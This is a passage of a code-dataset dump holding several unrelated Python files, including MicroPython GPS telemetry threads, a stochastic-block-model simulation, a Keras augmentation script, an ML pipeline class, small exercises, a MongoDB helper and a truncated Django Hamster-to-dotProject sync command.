TelemetryModule(object):\n def __init__(self, uart_number):\n self.uart = pyb.UART(uart_number, 9600)\n self.last_longitude = 0\n self.last_latitude = 0\n self.time_since_disarm = 300\n self.time_since_last_message = 15\n self.last_armed = 0\n\n def send_message(self, message):\n self.uart.write(message)\n\n @staticmethod\n def decode_message(message):\n message = message.split(\",\")\n\n armed = int(message[0][1:])\n latitude = float(message[1])\n longitude = float(message[2][:-2])\n\n return armed, latitude, longitude\n\n class GPS_Module(object):\n def __init__(self, uart_number):\n self.uart = pyb.UART(uart_number, 9600)\n self.gps = MicropyGPS()\n\n def get_location(self):\n return (Subsystem.GPS_Module.convert_coordinate_to_decimal(self.gps.latitude), Subsystem.GPS_Module.convert_coordinate_to_decimal(self.gps.longitude))\n\n @staticmethod\n def convert_coordinate_to_decimal(coordinate_list):\n degrees = float(coordinate_list[0])\n minutes = float(coordinate_list[1])\n return degrees + minutes / 60\n\ndef telemetry_listen_thread(threadName, subsystem, delay):\n print(\"Starting thread %TL% \", threadName)\n\n while True:\n while not subsystem.stop_flag:\n if subsystem.telemetry_module.uart.any():\n try:\n data_line = subsystem.telemetry_module.uart.readline().decode('ascii')\n except UnicodeError:\n data_line = \"\"\n if len(data_line) > 10:\n if data_line[0] == '(' and data_line[-2] == ')':\n try:\n armed_state, subsystem.telemetry_module.last_latitude, subsystem.telemetry_module.last_longitude = subsystem.TelemetryModule.decode_message(data_line)\n subsystem.telemetry_module.last_armed = armed_state\n print(\"%TL% *Message decoded* |armed_state: \" + str(armed_state) + \" |longitude: \" + str(subsystem.telemetry_module.last_longitude) + \" |latitude: \" + str(subsystem.telemetry_module.last_latitude) + \" |\")\n subsystem.telemetry_module.time_since_last_message = 0\n\n if not armed_state:\n subsystem.armed = 0\n subsystem.telemetry_module.time_since_disarm = 0\n else:\n subsystem.armed = 1\n subsystem.telemetry_module.time_since_disarm += delay\n time.sleep(delay)\n except ValueError:\n subsystem.telemetry_module.time_since_last_message += delay\n subsystem.telemetry_module.time_since_disarm += delay\n time.sleep(delay)\n else:\n subsystem.telemetry_module.time_since_last_message += delay\n subsystem.telemetry_module.time_since_disarm += delay\n time.sleep(delay)\n print(\"%TL% Time since last message: \", subsystem.telemetry_module.time_since_last_message)\n print(\"%TL% Time since last disarm transmission: \", subsystem.telemetry_module.time_since_disarm)\n if subsystem.telemetry_module.time_since_last_message > 1900:\n subsystem.telemetry_module.time_since_last_message /= 2\n if subsystem.telemetry_module.time_since_disarm > 1900:\n subsystem.telemetry_module.time_since_disarm /= 2\n time.sleep(delay)\n\ndef update_gps_thread(threadName, subsystem, delay):\n print(\"%G% Starting thread \", threadName)\n\n while True:\n while not subsystem.stop_flag:\n if subsystem.gps_module.uart.any():\n subsystem.gps_module.gps.update(chr(subsystem.gps_module.uart.readchar()))\n else:\n time.sleep(delay)\n time.sleep(delay)\n\ndef transmit_location_thread(threadName, subsystem, delay):\n print(\"%TT% Starting thread \", threadName)\n time_to_rearm = 300 # 5 minutes\n\n while True:\n while not subsystem.stop_flag:\n subsystem_latitude, subsystem_longitude = subsystem.gps_module.get_location()\n\n if subsystem.time_since_disarm >= time_to_rearm:\n subsystem.armed = 1\n\n 
subsystem.time_since_disarm += delay\n message = \"(\" + str(subsystem.armed) + \",\" + str(subsystem_latitude) + \",\" + str(subsystem_longitude) + \")\\n\"\n subsystem.telemetry_module.send_message(message)\n print(\"%TT% message sent (excluding \\\\n)\", message[:-1])\n print(\"%TT% time since disarm \", subsystem.time_since_disarm)\n\n time.sleep(delay)\n time.sleep(delay)\n\n\n#car_seat_subsystem = Subsystem(subsystem_type='car_seat', power_estimator_adc_pin_name='X1', power_estimator_adc_gpio_pin_name='X3', telemetry_module_uart_pin_number=1, gps_module_uart_number=3, vibration_motor_pin_name='X5', buzzer_pin_name='X2')\nkey_fob_subsystem = Subsystem(subsystem_type='key_fob', power_estimator_adc_pin_name='X2', power_estimator_adc_gpio_pin_name='X1', telemetry_module_uart_pin_number=3, gps_module_uart_number=1, vibration_motor_pin_name='Y8', buzzer_pin_name='X4')\n#pseudo_car_seat_system = Subsystem(subsystem_type='car_seat', power_estimator_adc_pin_name='X2', power_estimator_adc_gpio_pin_name='X1', telemetry_module_uart_pin_number=3, gps_module_uart_number=1, vibration_motor_pin_name='Y8', buzzer_pin_name='X4')\nkey_fob_subsystem.run()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":41850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"529082411","text":"from os.path import basename\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed, wrap_non_picklable_objects\nfrom sacred import Experiment\nfrom sacred.observers import FileStorageObserver, SlackObserver\n\nfrom src.utils import gen_B, gen_sbm, save_obj\nfrom src.models import select_sbm\n\n\nex = Experiment(\"SBM model selection\")\n\ncurrent_file = basename(__file__)[:-3]\n\npickle_path = Path(\"./maggot_models/simulations/outs/\")\nsacred_file_path = Path(f\"./maggot_models/simulations/runs/{current_file}\")\n\nslack_obs = SlackObserver.from_config(\"slack.json\")\n\nfile_obs = FileStorageObserver.create(sacred_file_path)\n\nex.observers.append(slack_obs)\nex.observers.append(file_obs)\n\n\n@ex.config\ndef config():\n \"\"\"Variables defined in config get automatically passed to main\"\"\"\n\n n_sims = 2 # noqa: F841\n n_jobs = -2 # noqa: F841\n n_blocks_range = list(range(1, 9))\n n_verts_range = [100, 200, 300, 500, 800, 1000] # noqa: F841\n n_block_try_range = list(range(1, 11)) # noqa: F841\n n_components_try_range = list(range(1, 13)) # noqa: F841\n\n # keep these the same\n a = 0.1\n b = 0.1\n\n # how strong to make the block diagonal\n assortivity = 6\n\n B_mat = gen_B(n_blocks_range[-1], a=a, b=b, assortivity=assortivity) # noqa: F841\n\n directed = False # noqa: F841\n\n\ndef run_sim(\n seed,\n n_blocks_range,\n n_verts_range,\n n_components_try_range,\n n_block_try_range,\n B_mat,\n directed,\n):\n np.random.seed(seed)\n columns = [\n \"n_params_gmm\",\n \"n_params_sbm\",\n \"rss\",\n \"mse\",\n \"score\",\n \"n_components_try\",\n \"n_block_try\",\n \"n_blocks\",\n \"n_verts\",\n ]\n master_sbm_df = pd.DataFrame(columns=columns)\n\n for i, n_blocks in enumerate(n_blocks_range):\n B_mat_trunc = B_mat[:n_blocks, :n_blocks]\n for j, n_verts in enumerate((n_verts_range)):\n graph, labels = gen_sbm(n_verts, n_blocks, B_mat_trunc)\n sbm_df = select_sbm(\n graph, n_components_try_range, n_block_try_range, directed=directed\n )\n sbm_df[\"n_verts\"] = n_verts\n sbm_df[\"n_blocks\"] = n_blocks\n master_sbm_df = master_sbm_df.append(sbm_df, ignore_index=True, sort=True)\n\n return 
master_sbm_df\n\n\n@ex.automain\ndef main(\n n_sims,\n n_jobs,\n n_blocks_range,\n n_verts_range,\n n_components_try_range,\n n_block_try_range,\n B_mat,\n directed,\n):\n seeds = np.random.randint(1e8, size=n_sims)\n\n # @delayed\n # @wrap_non_picklable_objects\n def run(seed):\n \"\"\" Like a lambda func \"\"\"\n return run_sim(\n seed,\n n_blocks_range,\n n_verts_range,\n n_components_try_range,\n n_block_try_range,\n B_mat,\n directed,\n )\n\n outs = Parallel(n_jobs=n_jobs, verbose=40)(delayed(run)(seed) for seed in seeds)\n\n columns = [\n \"n_params_gmm\",\n \"n_params_sbm\",\n \"rss\",\n \"mse\",\n \"score\",\n \"n_components_try\",\n \"n_block_try\",\n \"n_blocks\",\n \"n_verts\",\n \"sim_ind\",\n ]\n master_out_df = pd.DataFrame(columns=columns)\n for i, out in enumerate(outs):\n out[\"sim_ind\"] = i\n master_out_df = master_out_df.append(out, ignore_index=True, sort=True)\n # file_obs = ex.observers[1]\n save_obj(master_out_df, file_obs, \"master_out_df\")\n return 0\n","sub_path":"simulations/runs/sbm_rss_lik_sim/_sources/sbm_rss_lik_sim_e348c6baf3707e0d54d99bc2af58c421.py","file_name":"sbm_rss_lik_sim_e348c6baf3707e0d54d99bc2af58c421.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"428543400","text":"from keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nimport rntools2 as rn\nimport time\nimport cv2 as cv\nfrom keras.callbacks import History \nimport os.path as path\nimport os\nfrom keras.callbacks import EarlyStopping, TensorBoard\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom datetime import datetime\nimport keras.callbacks\n\nMEAN = 107.28881107756136\nSTD = 56.13891853797195\n#the values for the YOLO dataset are similar, being:\n#MEAN = 114.52824919676081\n#STD = 60.79076172579519\ni = 0\n\ndef normalize(x):\n global i\n i= i + 1\n \n x = (x-MEAN)/STD\n \n return x\n\ndef gen_with_norm(gen, normalize):\n for x in gen:\n yield normalize(x)\n\n\nhistory = History()\n\nnow = rn.getTime()\n\n#Paths\n\npathImg = rn.gdir + 'Databases/LP/BR_LP_SPLIT/original'\npathAnn = rn.gdir + 'Databases/LP/BR_LP_SPLIT/ann'\n\n#pathImg = rn.gdir + 'Databases/LP/DEBUG/original'\n#pathAnn = rn.gdir + 'Databases/LP/DEBUG/ann'\n\n\npathAugImg = rn.gdir + 'Databases/LP/AUG/img'\npathAugAnn = rn.gdir + 'Databases/LP/AUG/ann'\npathTestImg= rn.gdir + 'Databases/LP/TESTS/img/'\npathTestAnn= rn.gdir + 'Databases/LP/TESTS/ann/'\nGDIR = '/home/hanel/License Plate Detection/'\nLOG_DIRECTORY_ROOT = GDIR+'Logs/'\n#modelPath = GDIR+'Models/Training/'+ now +'/'\n#os.mkdir(modelPath)\n\nmodelPath = rn.gdir + 'Models/Training/' + 'test14/'\nmodelName, TRAINING_NUMBER = rn.get_latest_model(modelPath)\nmodel = load_model(modelPath + modelName)\n\n#_, _, x_test, y_test, image_size, image_total = rn.prepare_data(pathTestImg, pathTestAnn, 0)\n\nout_batch = rn.NBatchLogger(modelPath, display=100)\n\nPATIENCE = 100\nearly_stopping = EarlyStopping(monitor='loss', min_delta=0, patience=PATIENCE, verbose=0, mode='auto')\n\n# TensorBoard callback\n\nlog_dir = \"{}/run-{}/\".format(LOG_DIRECTORY_ROOT, now)\ntensorboard = TensorBoard(log_dir=log_dir, write_graph=True, write_images=True)\n#terminal: tensorboard --logdir /home/hanel/VisualStudio/planesnet/logs_tensorboard/\nmodel_checkpoint = keras.callbacks.ModelCheckpoint(modelPath+'{epoch:02d}.hdf5', monitor='val_loss', verbose=0, save_best_only=False, save_weights_only=False, mode='auto', period=1)\n\n#callbacks = 
[history, early_stopping, tensorboard, out_batch, model_checkpoint]\n\ncallbacks = rn.setCallbacks(modelPath, now, TRAINING_NUMBER, history)\n\n\ndata_gen_args = dict(featurewise_center=False,\n featurewise_std_normalization=False,\n rotation_range=15,\n width_shift_range=0.05,\n height_shift_range=0.05,\n shear_range = 0.1,\n horizontal_flip = False,\n vertical_flip = False,\n zca_whitening = False,\n fill_mode = 'constant',\n zoom_range=0.3)\n\n'''\ndata_gen_args = dict(samplewise_center=False,\n samplewise_std_normalization=False,\n rotation_range=0,\n width_shift_range=0,\n height_shift_range=0,\n shear_range = 0,\n horizontal_flip = False,\n vertical_flip = False,\n zca_whitening = False,\n fill_mode = 'constant',\n zoom_range=0)\n'''\n \nimage_datagen = ImageDataGenerator(**data_gen_args)\nmask_datagen = ImageDataGenerator(**data_gen_args)\nimage_datagen.mean = 107.28881107756136\nimage_datagen.std = 56.13891853797195\n# Provide the same seed and keyword arguments to the fit and flow methods\nseed = 2\n#image_datagen.fit(images, augment=True, seed=seed)\n#mask_datagen.fit(masks, augment=True, seed=seed)\n\nimage_generator = gen_with_norm(image_datagen.flow_from_directory(\n pathImg,\n class_mode=None,\n seed=seed,\n target_size= (405,360),\n color_mode=\"grayscale\",\n #save_to_dir=pathAugImg,\n #save_prefix='img',\n batch_size=10), normalize)\n\nmask_generator = mask_datagen.flow_from_directory(\n pathAnn,\n class_mode=None,\n seed=seed,\n target_size= (404,360),\n color_mode=\"grayscale\",\n #save_to_dir=pathAugAnn,\n #save_prefix='ann',\n batch_size=10)\n\n# combine generators into one which yields image and masks\ntrain_generator = zip(image_generator, mask_generator)\n\nwith open(modelPath+'/log.txt',\"a\") as log:\n log.write(rn.getTime()+ \": TRAINING NUMBER {:2d} STARTED\\n\".format(TRAINING_NUMBER))\n log.write(\" DATABASE USED: \" + pathImg + '\\n')\n log.write(\" TENSORBOARD LOG: \" + rn.gdir + 'logs_tensorboard/' + now + '\\n')\n\n'''\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=2,\n epochs=800,\n callbacks = callbacks)\n'''\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=300,\n callbacks = callbacks)\n#1133\n#test_predictions = model.predict(x_test)\n#test_predictions = np.round(test_predictions)\n#accuracy = accuracy_score(y_test, test_predictions)\n\n\nwith open(modelPath+'/log.txt',\"a\") as log:\n log.write(rn.getTime()+ \": TRAINING NUMBER {:2d} COMPLETED\\n\".format(TRAINING_NUMBER))\n log.write(\"\\n**************************************************\\n\\n\")\n #log.write(\"Final Accuracy: {:6f}\\n\".format(accuracy))\n log.write(\"Loss and Acc History: \\n\")\n for i in range(len(history.history['loss'])):\n log.write(\"Epoch {:2d}: loss = {:6f}, acc = {:6f}\\n\".format(i,history.history['loss'][i],history.history['acc'][i]))\n log.write(\"\\n**************************************************\\n\\n\")\n ","sub_path":"Main Code/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319613974","text":"from imblearn.pipeline import Pipeline\nimport numpy as np\n\n\ndef f_array(in_array):\n return np.array(in_array).astype(float)\n\n\nclass ABCD_Pipeline(Pipeline):\n\n def __init__(self, steps, memory=None, verbose=False,\n mapping=False, to_map=None, names=None):\n\n self.mapping = mapping\n\n if to_map is None:\n to_map = []\n self.to_map = to_map\n\n if names is None:\n names = 
[]\n self.names = names\n\n super().__init__(steps, memory, verbose)\n\n def get_params(self, deep=True):\n params = super()._get_params('steps', deep=deep)\n return params\n\n def set_params(self, **kwargs):\n super()._set_params('steps', **kwargs)\n return self\n\n def fit(self, X, y=None, mapping=None,\n train_data_index=None, **fit_params):\n\n # Add mapping to fit params, as either passed or new\n if mapping is not None:\n self._mapping = mapping\n elif self.mapping:\n self._mapping = {i: i for i in range(X.shape[1])}\n else:\n self._mapping = {}\n\n for name in self.to_map:\n fit_params[name + '__mapping'] = self._mapping\n\n super().fit(X, y, **fit_params)\n\n return self\n\n def _get_objs_by_name(self):\n\n fitted_objs = [[self.__getitem__(name) for name in obj]\n for obj in self.names]\n return fitted_objs\n\n def has_transforms(self):\n fitted_objs = self._get_objs_by_name()\n\n if len(fitted_objs[0]) > 0 or len(fitted_objs[3]) > 0:\n return True\n return False\n\n def proc_X_test(self, X_test, y_test, fs=True):\n\n # Order of names is:\n #\n # 0 - 'loaders'\n # 1 - 'imputers'\n # 2 - 'scalers'\n # 3 - 'transformers'\n # 4 - 'samplers'\n # 5 - 'drop_strat'\n # 6 - 'feat_selectors',\n # 7 - 'models'\n # 8 - 'ensembles'\n\n # Load all base objects and corresponding fitted objs\n fitted_objs = self._get_objs_by_name()\n\n feat_names = list(X_test)\n\n # Process the loaders, while keeping track of feature names\n for loader in fitted_objs[0]:\n\n # Use special transform in place df func\n X_test = loader.transform_df(X_test, base_name=feat_names)\n feat_names = list(X_test)\n\n # Apply pipeline operations in place\n for imputer in fitted_objs[1]:\n X_test[feat_names] = imputer.transform(f_array(X_test))\n for scaler in fitted_objs[2]:\n X_test[feat_names] = scaler.transform(f_array(X_test))\n\n # Handle transformers, w/ simmilar func to loaders\n for i in range(len(fitted_objs[3])):\n\n # Grab transformer and base name\n transformer = fitted_objs[3][i]\n base_name = self.names[3][i]\n\n # Use special transform in place df func\n X_test = transformer.transform_df(X_test, base_name=base_name)\n feat_names = list(X_test)\n\n # Skip fitted_objs[4] here, as it is samplers\n\n # Make sure to keep track of col changes w/ drop + feat_selector\n for drop in fitted_objs[5]:\n\n valid_inds = np.array(drop.transformers[0][2])\n feat_names = np.array(feat_names)[valid_inds]\n X_test = X_test[feat_names]\n\n # Drop features according to feat_selectors, keeping track of changes\n # only if passed param fs is True\n if fs:\n for feat_selector in fitted_objs[6]:\n\n feat_mask = feat_selector.get_support()\n feat_names = np.array(feat_names)[feat_mask]\n\n X_test[feat_names] = feat_selector.transform(X_test)\n X_test = X_test[feat_names]\n\n return X_test, y_test\n\n def proc_X_train(self, X_train, y_train):\n\n # Load all base objects\n fitted_objs = self._get_objs_by_name()\n\n # No need to proc in place, so the transformations are pretty easy\n for loader in fitted_objs[0]:\n X_train = loader.transform(f_array(X_train))\n for imputer in fitted_objs[1]:\n X_train = imputer.transform(f_array(X_train))\n for scaler in fitted_objs[2]:\n X_train = scaler.transform(X_train)\n for transformer in fitted_objs[3]:\n X_train = transformer.transform(X_train)\n for sampler in fitted_objs[4]:\n X_train, y_train = sampler.fit_resample(X_train, y_train)\n for drop in fitted_objs[5]:\n X_train = drop.transform(X_train)\n for feat_selector in fitted_objs[6]:\n X_train = feat_selector.transform(X_train)\n\n return 
X_train\n\n def inverse_transform_FIs(self, fis, feat_names):\n\n # Make compat w/ subjects x feats\n if len(fis.shape) == 1:\n fis = np.expand_dims(fis, axis=0)\n\n # To inverse transform FIs, we are only concerned with feat_selectors\n # transformers, and loaders\n fitted_objs = self._get_objs_by_name()\n\n # Feat selectors\n for feat_selector in fitted_objs[6][::-1]:\n fis = feat_selector.inverse_transform(fis)\n\n # Reverse drop strat\n for drop in fitted_objs[5]:\n fis = drop.inverse_transform(fis)\n\n # Transformers\n for transformer, name in zip(fitted_objs[3][::-1],\n self.names[3][::-1]):\n fis = transformer.inverse_transform(fis, name=name)\n\n # Loaders - special case\n inversed_loaders = {}\n for loader, name in zip(fitted_objs[0][::-1],\n self.names[0][::-1]):\n fis, inverse_X = loader.inverse_transform(fis, name=name)\n inversed_loaders.update(inverse_X)\n\n # Make the final feat_importances dict\n feat_imp_dict = {}\n for i in range(len(feat_names)):\n if i in inversed_loaders:\n feat_imp_dict[feat_names[i]] = inversed_loaders[i]\n else:\n feat_imp_dict[feat_names[i]] = fis[:, i]\n\n return feat_imp_dict\n","sub_path":"ABCD_ML/pipeline/ABCD_Pipeline.py","file_name":"ABCD_Pipeline.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"638477162","text":"# lista = [0,1,2,3,4,5]\n# print(len(lista))\n# print(lista[6-1]) \n# mostrando ultimo elemento da lista\n\nclass Stack(object):\n def __init__(self):\n self.stack = []\n self.len_stack = 0\n \n def push(self, e):\n self.stack.append(e)\n self.len_stack += 1\n \n def pop(self):\n if not self.empty(): #se a pilha nao estiver vazia remove, pois empty retorna true se estiver vazio, logo, se estiver vazio ele nao entra ai!\n self.stack.pop(self.len_stack-1)\n self.len_stack -= 1\n else:\n print('Stack has empty!')\n \n def top(self):\n if not self.empty():\n return self.stack[-1]\n return None\n\n def empty(self):\n if self.len_stack == 0:\n return True\n return False\n\n def lenght(self):\n return self.len_stack\n\n def __str__(self):\n return '{}'.format(self.stack)\n\nstack = Stack()\nstack.pop()\nstack.push(5)\nstack.push(3)\nstack.push(6)\nprint(stack)\nprint('len is %d'%stack.lenght())\n\nprint(stack.top())\nstack.pop()\nprint(stack.top())\nstack.pop()\nprint(stack.top())\nstack.pop()\nprint(stack.top())\nprint('len is %d'%stack.lenght())\nstack.pop()\nprint('len is %d'%stack.lenght())\n","sub_path":"Algoritmos e Estruturas de Dados/Estruturas de Dados/pilha_otimizado/foo.py","file_name":"foo.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569835494","text":"import pandas as pd\nimport random as rnd\n\n\nclass Game:\n def __init__(self):\n stats = pd.read_csv('../data/batters.csv', header=0)\n stats['1B'] = stats['H'] - (stats['2B'] + stats['3B'] + stats['HR'])\n stats['1B%'] = stats['1B'] / stats['H']\n stats['2B%'] = stats['2B'] / stats['H']\n stats['3B%'] = stats['3B'] / stats['H']\n stats['HR%'] = stats['HR'] / stats['H']\n stats['Opportunities'] = stats['AB'] + \\\n stats['HBP'] + stats['BB'] + stats['SF']\n games_filter = stats['G'] > 5\n stats = stats.loc[games_filter]\n self._data = stats[['Player', 'Team', 'Pos', '1B%',\n '2B%', '3B%', 'HR%', 'BB', 'HBP', 'SF', 'AVG', 'OBP']].copy()\n\n def list_teams(self):\n return sorted(list(self._data['Team'].unique()))\n\n def get_players(self, team):\n team_filter = 
self._data['Team'] == team.upper()\n return self._data.loc[team_filter]\n\n def at_bat(self, player):\n hit_or_onbase = rnd.random()\n if hit_or_onbase > (1 - player['AVG'].values[0]):\n type_of_hit = rnd.random()\n if type_of_hit > (1 - player['HR%'].values[0]):\n return 'HR'\n elif type_of_hit > (1 - player['3B%'].values[0]):\n return '3B'\n elif type_of_hit > (1 - player['2B%'].values[0]):\n return '2B'\n else:\n return '1B'\n elif hit_or_onbase > (1 - player['OBP'].values[0]):\n bb_hbp_sf = rnd.random()\n return 'WALK'\n else:\n return 'OUT'\n","sub_path":"notebooks/baseball.py","file_name":"baseball.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"201425907","text":"from datetime import datetime\n\n# Game settings\nmax_days_in_game = 5\nend_of_day = datetime(2018, 1, 1, 17, 0, 0)\nlast_patient_accepted = datetime(2018, 1, 1, 16, 18, 0)\nmax_random_integer = 30\n\n# Waiting Room Settings\nmax_waiting_rooms = 1\nmax_waiting_room_capacity = 15\nwaiting_room_random_iterator = 7\n\n# Patient Room Settings\nmax_patient_rooms = 10\n\n# Condition Settings\npossible_conditions_list = [\"Flu\",\n \"Broken Bone\",\n \"Cold\",\n \"Migraine\",\n \"Stomach Virus\",\n \"Sore Throat\",\n \"Chest Pain\",\n \"Measels\",\n \"Appendicitis\",\n \"Bronchitis\",\n \"Laryngitis\",\n \"Asthma\",\n ]\n# The defaults will allow for a max of 40 minutes spent in the patient room\nmax_condition_severity = 10\nmax_patient_time_multiplier = 4\n\npatient_names_list = [\"Margene Constante\",\n\"Isabelle Getty\",\n\"Cathi Cureton\",\n\"Cristine Sommerfield\",\n\"Oliva Matthew\",\n\"Jasmin Mei\",\n\"Dana Pehrson\",\n\"Ileana Leven\",\n\"Karon Trowell\",\n\"Monroe Farrelly\",\n\"Tasia Dirks\",\n\"Tamica Berkowitz\",\n\"Leann Harrod\",\n\"Hildegard Glade\",\n\"Sherie Caiazzo\",\n\"Aracely Metayer\",\n\"Daniella Larger\",\n\"Lanora Ledet\",\n\"Latia Melin\",\n\"Nida Kuhns\",\n\"Ralph Burley\",\n\"Katerine Cutchin\",\n\"Jeremy Palacios\",\n\"Rudolph Macedo\",\n\"Jasper Segers\",\n\"Olinda Mitchem\",\n\"Earle Muncy\",\n\"Zulema Fobbs\",\n\"Noella Duggan\",\n\"Grant Naughton\",\n\"Towanda Shattles\",\n\"Meaghan Baisden\",\n\"Alease Nogle\",\n\"Merlene Pittard\",\n\"Eugenie Markell\",\n\"Marylee Mott\",\n\"Modesto Elias\",\n\"Jonna Scaglione\",\n\"Erline Tutson\",\n\"Rhonda Ocasio\",\n\"Marget Silversmith\",\n\"Roxanna Westling\",\n\"Christopher Stroope\",\n\"Dorethea Tedford\",\n\"Lurline Granda\",\n\"Lashanda Mckeithan\",\n\"Lashandra Flett\",\n\"Leonel Madewell\",\n\"Rosemary Bancroft\",\n\"Cyrstal Rahimi\"]","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124499941","text":"import requests\n# from requests.api import head\nurl = \"http://m.ip138.com/iplookup.asp\"\ntry:\n headers = {\"User-Agent\": \"Chrome/88.0.4324.104\"}\n kv = {'ip': '183.226.23.150'}\n r = requests.get(url, params=kv, headers = headers)\n print(r.request.url)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n print(r.text[1850:2600])\nexcept:\n print(\"爬取失败\")","sub_path":"other/爬虫/基础爬取/04.IPquery.py","file_name":"04.IPquery.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"388748157","text":"from tkinter import *\r\nfrom tkinter import ttk\r\n\r\nroot = Tk()\r\nroot.title(\"Naslov\")\r\n\r\neno_okno 
= ttk.Frame(root, padding = \"3 3 12 12\")\r\neno_okno.grid(column=0, row=0, sticky=(N, W, E, S))\r\neno_okno.columnconfigure(0, weight=1)\r\neno_okno.rowconfigure(0, weight=1)\r\nttk.Label(eno_okno, text = \"Herorur\").grid(row = 1, column = 1)\r\nknof = ttk.Button(eno_okno, text = \"KNOF JOU\", command = lambda: print(\"Charlie\")).grid(row = 2, column = 1)\r\n\r\nroot.mainloop()\r\n","sub_path":"tkinter_testi.py","file_name":"tkinter_testi.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"414515176","text":"NUMBERS_WANTED = 5\nnumbers = []\nusernames = ['jimbo', 'giltson98', 'derekf', 'WhatSup', 'NicolEye', 'swei45', 'BaseInterpreterInterface', 'BaseStdIn', 'Command', 'ExecState', 'InteractiveConsole', 'InterpreterInterface', 'StartServer', 'bob']\n\nusername_is_valid = False\nwhile not username_is_valid:\n    input_username = input(\"Username: \")\n    if input_username in usernames:\n        username_is_valid = True\n        break\n    print(\"Invalid username!\")\n\nfor i in range(NUMBERS_WANTED):\n    numbers.append(int(input(\"Number: \")))\nprint(numbers)\n\nprint(\"the first number is {}\".format(numbers[0]))\nprint(\"the last number is {}\".format(numbers[-1]))\nprint(\"the smallest number is {}\".format(min(numbers)))\nprint(\"the largest number is {}\".format(max(numbers)))\nprint(\"the average of the numbers is {:.1f}\".format(sum(numbers)/len(numbers)))\n\n","sub_path":"prac_04/list_exercises.py","file_name":"list_exercises.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"144699384","text":"# !/usr/bin/env python\n# coding=UTF-8\n\nimport os\ntry:\n    from pymongo import MongoClient\nexcept:\n    import pymongo\n\n\nclass ControlData(object):\n    \"\"\"\n    pipeline管道操作\n    数据库连接,查询,存储\n    \"\"\"\n    def __init__(self, mongo_host, mongo_port):\n        self.files = os.path.join(os.path.abspath('LOGDATA'), '%s')\n        self._data_makedir()\n        # 此处mongodb是用的台式机ip 根据实际存储位置修改\n        self.client = MongoClient(host=mongo_host, port=mongo_port)\n\n    @staticmethod\n    def _data_makedir(): # 当前脚本所在位置若没有LOGDATA文件夹则创建,脚本执行情况记录到文件中\n        if not os.path.exists('./LOGDATA'):\n            os.makedirs('./LOGDATA')\n\n    def data_save_txt(self, data, filename, savetype='w'):\n        \"\"\"\n        储存数据到txt文本,data格式必须为list或str\n        :param data: 存储内容\n        :param filename: 存储文件名\n        :param savetype: 存储类型,默认为 w 重写\n        :return: data类型错误返回fail\n        \"\"\"\n\n        with open(self.files % filename, savetype, encoding='UTF-8') as f:\n            if isinstance(data, list):\n                for eachdata in data:\n                    f.write(eachdata + '\\n')\n            elif isinstance(data, str):\n                f.write(data + '\\n')\n            else:\n                return 'fail'\n\n    def data_read_txt(self, filename, readtype='r'):\n        \"\"\"\n        读取txt中的内容并返回\n        :param filename: 读取文件名\n        :param readtype: 读取方式,默认为 r\n        :return: 文件内容的生成器\n        \"\"\"\n\n        return (eachdata for eachdata in open(self.files % filename, readtype, encoding='UTF-8'))\n\n    def data_save_db(self, data, dbname, colname):\n        \"\"\"\n        存储内容到mongodb\n        :param data: 存储内容,必须为dict或dict组成的list\n        :param dbname: 数据库名称\n        :param colname: 集合名\n        :return: 存储失败则返回 fail\n        \"\"\"\n        db = self.client[dbname]\n        col = db[colname]\n        if isinstance(data, list):\n            col.insert_many(data)\n        elif isinstance(data, dict):\n            col.insert(data)\n\n        return 'save succeed'\n\n    def data_read_db(self, dbname, colname):\n        \"\"\"\n        读取mongodb中的数据\n        :param dbname: 数据库名称\n        :param colname: 集合名称\n        :return: mongodb的游标,可遍历\n        \"\"\"\n        db = self.client[dbname]\n        col = db[colname]\n        res = col.find({}, 
{'_id': 0}, no_cursor_timeout=True) # 默认返回该集合所有数据,并且游标cursor设置不超时\n\n return res\n\n","sub_path":"whiteList_v6/whole_pipeline.py","file_name":"whole_pipeline.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26976169","text":"from django.core.management.base import NoArgsCommand, CommandError\nfrom django.db import settings\nfrom _dotproject import DotProjectBot\nfrom h2dp.hamster.models import Fact, Tag, FactTag\nimport logging\n\n\nclass Command(NoArgsCommand):\n help = \"Syncs your hamster's logs into dotproject\"\n\n def handle_noargs(self, **options):\n\n br = DotProjectBot(settings.DP_BASE_URL)\n br.login(settings.DP_USERNAME, settings.DP_PASSWORD)\n\n categories = settings.HAMSTER_TO_DP.keys()\n tag_logged, created = Tag.objects.get_or_create(name = '_logged_in_dp_')\n if created:\n tag_logged.save()\n facts = Fact.objects \\\n .exclude(tags=tag_logged) \\\n .exclude(end_time=None) \\\n .filter(activity__category__name__in=categories)\n\n for f in facts:\n #process data\n tags = 